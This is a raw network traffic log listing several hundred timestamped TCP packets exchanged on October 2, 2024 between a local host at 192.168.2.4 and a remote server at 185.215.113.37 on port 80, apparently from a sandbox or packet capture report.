Oct 2, 2024 18:19:27.505933046 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.505940914 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.505943060 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.505953074 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.505963087 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.505968094 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.505971909 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.505981922 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.505990982 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.505995035 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.506001949 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.506011963 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.506015062 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.506023884 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.506028891 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.506045103 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.506067038 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.506942034 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.506951094 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.506961107 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.506970882 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.506978989 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.506988049 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.506989002 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.506998062 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.507008076 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.507014036 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.507019043 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.507028103 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.507036924 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.507039070 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.507046938 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.507055044 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.507064104 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.507069111 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.507075071 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.507083893 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.507093906 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.507095098 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.507103920 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.507112980 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.507119894 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.507122993 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.507133007 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.507133961 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.507143021 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.507145882 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.507153034 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.507162094 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.507174015 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.507196903 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.507405043 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.507416964 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.507426977 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.507436991 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.507446051 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.507456064 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.507463932 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.507472992 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.507481098 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.507491112 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.507499933 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.507518053 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.507518053 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.507518053 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.507518053 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.507522106 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.507531881 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.507531881 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.507540941 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.507555008 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.507564068 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.507564068 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.507575035 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.507585049 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.507591009 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.507595062 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.507606983 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.507610083 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.507616997 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.507631063 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.507646084 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.507664919 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.508215904 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.508227110 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.508236885 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.508246899 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.508253098 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.508256912 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.508266926 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.508271933 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.508276939 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.508286953 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.508301020 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.508316040 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.508501053 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.508512020 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.508521080 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.508532047 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.508536100 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.508563042 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.508656979 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.508671999 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.508682013 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.508692980 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.508701086 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.508707047 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.508716106 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.508723974 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.508727074 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.508735895 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.508745909 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.508752108 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.508754969 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.508764982 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.508769035 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.508775949 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.508784056 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.508801937 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.508915901 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.508925915 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.508935928 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.508946896 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.508953094 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.508956909 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.508997917 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.509023905 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.510963917 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.510973930 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.510982990 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.511003017 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.511003971 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.511013031 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.511020899 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.511029005 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.511032104 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.511040926 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.511054993 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.511059999 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.511064053 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.511074066 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.511079073 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.511082888 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.511090994 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.511095047 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.511099100 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.511102915 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.511110067 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.511112928 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.511121988 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.511132002 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.511142969 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.511147022 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.511156082 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.511157990 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.511164904 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.511176109 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.511178017 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.511208057 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.511213064 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.512181044 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.512190104 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.512201071 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.512211084 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.512219906 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.512228012 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.512229919 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.512239933 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.512245893 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.512249947 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.512255907 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.512278080 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.512299061 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.513014078 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.513022900 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.513031960 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.513046980 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.513056040 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.513062000 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.513067007 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.513076067 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.513082027 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.513084888 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.513093948 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.513094902 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.513103962 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.513113022 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.513122082 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.513124943 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.513130903 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.513140917 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.513149023 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.513149977 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.513159037 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.513159990 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.513165951 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.513176918 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.513185978 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.513195038 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.513195038 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.513205051 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.513211012 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.513220072 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.513221979 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.513240099 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.513252020 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.514189005 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.514198065 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.514206886 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.514216900 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.514230967 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.514230967 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.514240980 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.514251947 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.514255047 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.514267921 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.514272928 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.514276028 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.514286041 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.514287949 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.514296055 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.514305115 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.514308929 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.514313936 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.514328003 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.514338017 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.514343977 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.514347076 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.514349937 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.514355898 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.514364004 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.514364958 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.514377117 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.514379025 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.514388084 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.514395952 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.514405012 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.514405012 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.514420986 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.514435053 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.515024900 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.515034914 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.515044928 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.515054941 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.515064001 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.515070915 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.515074015 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.515084028 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.515085936 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.515094995 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.515100956 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.515126944 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.515156984 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.515168905 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.515192986 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.515214920 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.515302896 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.515312910 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.515321970 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.515331984 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.515340090 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.515341997 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.515347958 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.515352964 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.515362024 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.515367031 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.515372038 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.515382051 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.515400887 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.515403032 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.515404940 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.515413046 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.515422106 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.515438080 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.515450954 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.515459061 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.515461922 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.515486002 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.515491962 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.515501976 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.515511990 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.515511990 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.515522003 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.515526056 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.515532017 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.515546083 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.515547037 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.515556097 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.515574932 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.515588045 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.517033100 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.517044067 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.517052889 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.517062902 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.517071962 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.517081022 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.517083883 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.517093897 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.517102957 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.517102957 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.517112970 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.517119884 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.517128944 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.517137051 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.517152071 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.517173052 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.581022024 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.581073999 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.581083059 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.581124067 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.581144094 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.581166029 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.581175089 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.581183910 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.581198931 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.581212044 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.581221104 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.581222057 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.581243992 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.581262112 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.581356049 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.581363916 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.581372976 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.581382990 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.581388950 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.581393003 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.581402063 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.581425905 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.581495047 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.581526995 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.581588030 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.581633091 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.581650019 CEST	80	49737	185.215.113.37	192.168.2.4
